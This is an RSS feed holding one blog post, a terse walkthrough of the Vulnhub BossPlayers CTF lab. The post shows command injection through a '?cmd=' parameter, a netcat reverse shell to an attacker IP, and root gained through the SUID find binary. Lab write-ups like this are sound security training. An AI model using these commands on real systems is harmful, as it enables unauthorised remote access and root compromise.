<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>php &amp;mdash; drsh0&#39;s llog</title>
    <link>https://drsh0.writeas.com/tag:php</link>
    <description>my learning log; notes on cybersec activities, ctfs, and ill-equipped cyber adventures. Consume responsibly.</description>
    <pubDate>Sun, 26 Apr 2026 19:32:46 +0000</pubDate>
    <image>
      <url>https://i.snap.as/v7Oo2ci6.png</url>
      <title>php &amp;mdash; drsh0&#39;s llog</title>
      <link>https://drsh0.writeas.com/tag:php</link>
    </image>
    <item>
      <title>Vulnhub - BossPlayers CTF</title>
      <link>https://drsh0.writeas.com/vulnhub-bossplayers-ctf?pk_campaign=rss-feed</link>
      <description>&lt;![CDATA[URI: https://www.vulnhub.com/entry/bossplayersctf-1,375/&#xA;Difficulty: Easy&#xA;&#xA;  Aimed at Beginner Security Professionals who want to get their feet wet into doing some CTF&#39;s. It should take around 30 minutes to root.&#xA;&#xA;!--more--&#xA;&#xA;enum&#xA;&#xA;nmap&#xA;ssh + http; not much else to be seen here&#xA;webpage enumerate: robots.txt, index html source&#xA;find directory via index source (html comment)&#xA;&#xA;exploit&#xA;&#xA;it appears that the original developer wanted to ping via a web service on the server&#xA;try common terms used for this e.g ?command= or ?exec=&#xA;?cmd=id works; also looks like we have nc (which nc)&#xA;listener: rlwrap ncat -nlvp $PORT&#xA;reverse shell: nc -e /bin/sh $ATTACKING-IP $PORT &#xA;we&#39;re in with user www-data&#xA;grab user flag&#xA;&#xA;privesc&#xA;&#xA;spawn a tty (we have python): python -c &#39;import pty; pty.spawn(&#34;/bin/sh&#34;)&#39;&#xA;look for SUID binaries: find / -user root -perm -4000 -print 2  /dev/null&#xA;notable binaries: grep and find&#xA;both have entries on gtfobins&#xA;use find to spawn a root shell:&#xA;&#xA;find . -exec /bin/sh -p \; -quit&#xA;grab root flag&#xA;&#xA;#vulnhub #php #suid]]&gt;</description>
      <content:encoded><![CDATA[<p>URI: <a href="https://www.vulnhub.com/entry/bossplayersctf-1,375/" rel="nofollow">https://www.vulnhub.com/entry/bossplayersctf-1,375/</a>
Difficulty: Easy</p>

<blockquote><p>Aimed at Beginner Security Professionals who want to get their feet wet into doing some CTF&#39;s. It should take around 30 minutes to root.</p></blockquote>



<h2 id="enum" id="enum">enum</h2>
<ul><li>nmap</li>
<li>ssh + http; not much else to be seen here</li>
<li>webpage enumerate: robots.txt, index html source</li>
<li>find directory via index source (html comment)</li></ul>

<h2 id="exploit" id="exploit">exploit</h2>
<ul><li>it appears that the original developer wanted to ping via a web service on the server</li>
<li>try common terms used for this e.g <code>?command=</code> or <code>?exec=</code></li>
<li><code>?cmd=id</code> works; also looks like we have nc (<code>which nc</code>)</li>
<li>listener: <code>rlwrap ncat -nlvp $PORT</code></li>
<li>reverse shell: nc -e /bin/sh $ATTACKING-IP $PORT</li>
<li>we&#39;re in with user <code>www-data</code></li>
<li>grab user flag</li></ul>

<h2 id="privesc" id="privesc">privesc</h2>
<ul><li>spawn a tty (we have python): <code>python -c &#39;import pty; pty.spawn(&#34;/bin/sh&#34;)&#39;</code></li>
<li>look for SUID binaries: <code>find / -user root -perm -4000 -print 2&gt;/dev/null</code></li>
<li>notable binaries: <code>grep</code> and <code>find</code></li>
<li>both have entries on <a href="https://gtfobins.github.io/" rel="nofollow">gtfobins</a></li>
<li>use <code>find</code> to spawn a root shell:</li></ul>

<pre><code class="language-bash">find . -exec /bin/sh -p \; -quit
</code></pre>
<ul><li>grab root flag</li></ul>

<p><a href="https://drsh0.writeas.com/tag:vulnhub" class="hashtag" rel="nofollow"><span>#</span><span class="p-category">vulnhub</span></a> <a href="https://drsh0.writeas.com/tag:php" class="hashtag" rel="nofollow"><span>#</span><span class="p-category">php</span></a> <a href="https://drsh0.writeas.com/tag:suid" class="hashtag" rel="nofollow"><span>#</span><span class="p-category">suid</span></a></p>
]]></content:encoded>
      <guid>https://drsh0.writeas.com/vulnhub-bossplayers-ctf</guid>
      <pubDate>Thu, 10 Dec 2020 12:00:07 +0000</pubDate>
    </item>
  </channel>
</rss>